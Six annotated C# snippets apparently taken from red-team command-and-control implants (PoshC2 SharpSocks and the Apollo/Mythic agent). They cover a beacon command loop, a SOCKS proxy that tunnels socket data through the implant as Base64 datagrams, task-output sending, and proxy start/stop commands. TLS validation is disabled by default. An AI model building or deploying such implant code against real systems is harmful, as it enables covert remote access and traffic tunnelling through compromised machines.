Пример #1
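 /// <summary>
 /// Creates a fresh cancellation source and starts the command-channel loop
 /// on a separate task. If the loop reports failure or throws, all proxy
 /// communications are stopped through <paramref name="loopController"/>.
 /// </summary>
 /// <param name="loopController">Controller whose proxy comms are stopped when the command channel breaks.</param>
 public void StartCommandLoop(SocksController loopController)
 {
     // NOTE(review): a source left over from an earlier call is overwritten here
     // without being cancelled or disposed; confirm callers only start the loop once.
     _cancelTokenSource = new CancellationTokenSource();
     _cancelToken = _cancelTokenSource.Token;

     // The lambda takes one argument, so the token is passed as the task's state
     // object (hence the cast below) rather than as the task's own cancellation
     // token. Stopping therefore depends on CommandLoop observing the token.
     _commandChannelLoop = new System.Threading.Tasks.Task((g) =>
     {
         try
         {
             ImplantComms.LogMessage($"Command loop starting - beacon time is {C2Config.CommandBeaconTime}ms");
             if (!CommandLoop((CancellationToken)g))
             {
                 loopController.StopProxyComms();
                 _error.LogError("Stopping all proxy comms as command channel is now broken");
             }
         }
         catch (Exception ex)
         {
             // Only the exception message is logged; the stack trace is not recorded.
             _error.LogError($"Command Channel loop is broken {ex.Message}, hard stopping all connections");
             loopController.StopProxyComms();
         }
     }, _cancelToken);
     _commandChannelLoop.Start();
 }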
Пример #2
        /// <summary>
        /// Builds a <c>SocksClientConfiguration</c> from the supplied arguments,
        /// wraps it in a <c>SocksController</c>, initializes the controller and returns it.
        /// </summary>
        /// <param name="serverUri">Address of the command server.</param>
        /// <param name="commandChannelId">Session id used for the command channel.</param>
        /// <param name="HostHeader">Value stored in the configuration's HostHeader setting.</param>
        /// <param name="userAgent">User-Agent string stored in the configuration.</param>
        /// <param name="key">Key handed to the encryptor; must not be null.</param>
        /// <param name="urlPaths">URL paths stored in the configuration.</param>
        /// <param name="sessionCookieName">Name of the session cookie.</param>
        /// <param name="payloadCookieName">Name of the payload cookie.</param>
        /// <param name="wbProxy">Optional web proxy; only its presence is recorded here (UseProxy).</param>
        /// <param name="beaconTime">Beacon interval stored in the configuration (default 5000).</param>
        /// <param name="implantcomms">Logger; a <c>PoshDefaultImplantComms</c> is created when null.</param>
        /// <param name="sslFullValidation">Enables full TLS certificate validation; off by default.</param>
        /// <returns>The initialized controller.</returns>
        /// <exception cref="Exception">Thrown when <paramref name="key"/> is null.</exception>
        public static SocksController CreateSocksController(Uri serverUri, String commandChannelId, String HostHeader, String userAgent, SecureString key, List <String> urlPaths, String sessionCookieName, String payloadCookieName, IWebProxy wbProxy = null, short beaconTime = 5000, IImplantLog implantcomms = null, bool sslFullValidation = false)
        {
            IImplantLog log = implantcomms ?? new PoshDefaultImplantComms();

            var settings = new SocksClientConfiguration
            {
                CommandChannelSessionId = commandChannelId,
                BeaconTime = beaconTime,
                UserAgent = userAgent,
                CommandServerUI = serverUri,
                // NOTE(review): only a flag is set from wbProxy here; the proxy object
                // itself is not stored by this method - confirm where it is supplied.
                UseProxy = wbProxy != null,
                URLPaths = urlPaths,
                ImplantComms = log,
                HostHeader = HostHeader,
                PayloadCookieName = payloadCookieName,
                SessionCookieName = sessionCookieName,
                // TLS certificate validation is disabled unless the caller opts in.
                // The original author intends this for initial testing of deployed
                // infrastructure and recommends enabling it before production use.
                // With validation off, the server's identity is presumably not
                // verified, so the channel could be intercepted - confirm in the
                // code that consumes SSLFullValidation.
                SSLFullValidation = sslFullValidation
            };

            // The key is checked only after the configuration (and possibly a default
            // logger) has been constructed; a null key aborts before the controller exists.
            if (key == null)
            {
                throw new Exception("Encryption key is null");
            }

            // NOTE(review): the encryptor type is named "Debug..."; its strength
            // cannot be judged from this method.
            var controller = new SocksController(settings)
            {
                Encryptor = new DebugSimpleEncryptor(key),
                ImplantComms = log
            };

            controller.Initialize();
            return controller;
        }
Пример #3
 /// <summary>
 /// Hands each received datagram, in array order, to
 /// <c>SocksController.AddDatagramToQueue</c>.
 /// </summary>
 /// <param name="dgs">Datagrams to enqueue. Not null-checked: a null array throws.</param>
 public void DispatchSocksDatagrams(SocksDatagram[] dgs)
 {
     // The payload of each datagram is presumably Base64 text (a disabled debug
     // line in the original decoded dgs[i].data to report its length); nothing
     // is decoded or validated at this point.
     foreach (SocksDatagram datagram in dgs)
     {
         SocksController.AddDatagramToQueue(datagram);
     }
 }
Пример #4
        /// <summary>
        /// Sends pending task responses and queued SOCKS datagrams to the server in
        /// one request, then processes the reply. Responses the server marks as
        /// "error" are re-sent, up to MAX_RETRIES attempts in total.
        /// </summary>
        private void SendTaskOutput()
        {
            int retryCount = 0;

            // presumably both calls drain their queues; verify against JobManager / SocksController
            Tasks.ApolloTaskResponse[] responses  = JobManager.GetJobOutput();
            SocksDatagram[]            datagrams  = SocksController.GetMythicMessagesFromQueue();
            List <ApolloTaskResponse>  lResponses = new List <ApolloTaskResponse>(); // responses the server rejected; re-sent on the next attempt

            // Nothing is sent when there is neither task output nor proxy traffic.
            if (responses.Length > 0 || datagrams.Length > 0)
            {
                // One identifier per flush; the same value is reused for every retry.
                string guid = Guid.NewGuid().ToString();
                while (retryCount < MAX_RETRIES)
                {
                    // NOTE(review): datagrams is never reassigned, so every retry sends the
                    // full datagram array again alongside the reduced response list -
                    // confirm the receiving side tolerates duplicates.
                    string result = Profile.SendResponses(guid, responses, datagrams);
                    // A null or empty reply ends the flush without a retry.
                    if (string.IsNullOrEmpty(result))
                    {
                        break;
                    }
                    // The reply is network input parsed into a typed object; its fields are
                    // not validated before use below.
                    MythicServerResponse serverReply = JsonConvert.DeserializeObject <MythicServerResponse>(result);
                    // NOTE(review): serverReply and serverReply.responses are not null-checked
                    // here, unlike delegates further down.
                    foreach (MythicTaskResponse rep in serverReply.responses)
                    {
                        if (rep.status == "error")
                        {
                            // Single() throws unless exactly one pending response has this
                            // task_id, so an unknown or duplicated id in the reply aborts the flush.
                            lResponses.Add(responses.Single(c => c.task_id == rep.task_id));
                        }
                        else
                        {
                            Inbox.AddMessage(rep.task_id, rep);
                        }
                    }
                    if (serverReply.delegates != null && serverReply.delegates.Length > 0)
                    {
                        DispatchDelegates(serverReply.delegates);
                    }
                    // Only the rejected responses are carried into the next attempt.
                    responses = lResponses.ToArray();
                    lResponses.Clear();
                    retryCount += 1;
                    // Stop as soon as nothing was rejected.
                    if (responses.Length == 0)
                    {
                        break;
                    }
                }
            }
        }
Пример #5
        /// <summary>
        /// Reads from the client connection until <c>exited</c> is set or a read
        /// fails, forwarding every non-empty read as a Base64-encoded
        /// <c>SocksDatagram</c> via <c>SocksController.AddMythicMessageToQueue</c>.
        /// The connection is closed when the loop ends.
        /// </summary>
        private void ReadFromProxy()
        {
            // A 10 second receive timeout. Presumably ClientConnection is a Socket, in
            // which case a timed-out read raises SocketException and ends the loop below.
            ClientConnection.ReceiveTimeout = 10000;

            while (!exited)
            {
                byte[] chunk = new byte[MESSAGE_SIZE];
                int received = 0;

                try
                {
                    received = ClientConnection.Receive(chunk);
                }
                catch (SocketException ex)
                {
                    DebugWriteLine($"{IPAddress} ({ServerID}) error while reading from socket: {ex.Message} ({ex.SocketErrorCode}).");
                    break;
                }
                catch (Exception ex)
                {
                    DebugWriteLine($"{IPAddress} ({ServerID}) Unhandled exception while reading from socket: {ex.Message}");
                    break;
                }

                // NOTE(review): a zero-byte read is not treated as end-of-stream; the
                // loop simply reads again until exited is set or a read throws.
                if (received <= 0)
                {
                    continue;
                }

                // Only the bytes actually read are encoded, never the whole buffer.
                SocksDatagram outbound = new SocksDatagram()
                {
                    server_id = ServerID,
                    data = Convert.ToBase64String(chunk, 0, received),
                };
                SocksController.AddMythicMessageToQueue(outbound);
            }

            Close();
        }
Пример #6
        /// <summary>
        /// Handles a SOCKS task: reads the "action" field from the task's JSON
        /// parameters and starts or stops the client port accordingly. Any other
        /// action is reported on the job as an error.
        /// </summary>
        /// <param name="job">Job carrying the task; receives the completion or error status.</param>
        /// <param name="agent">Not used by this method.</param>
        public static void Execute(Job job, Agent agent)
        {
            Task task = job.Task;

            // NOTE(review): the parameters are cast straight to JObject, so input
            // that is not a JSON object (or is null) throws here rather than being
            // reported on the job.
            JObject parameters = (JObject)JsonConvert.DeserializeObject(task.parameters);
            string requested = parameters.Value <string>("action");

            if (requested == "start")
            {
                // Refuse a second start while the proxy is already running.
                if (SocksController.IsActive())
                {
                    job.SetError("Socks proxy is already active.");
                    return;
                }

                // Killing the job also shuts the client port down.
                job.OnKill = () =>
                {
                    SocksController.StopClientPort();
                };

                SocksController.StartClientPort();
                job.SetComplete($"SOCKS server started.");
            }
            else if (requested == "stop")
            {
                // Stop is issued without checking whether the proxy is active.
                SocksController.StopClientPort();
                job.SetComplete("SOCKS server stopped.");
            }
            else
            {
                job.SetError("Invalid action.");
            }
        }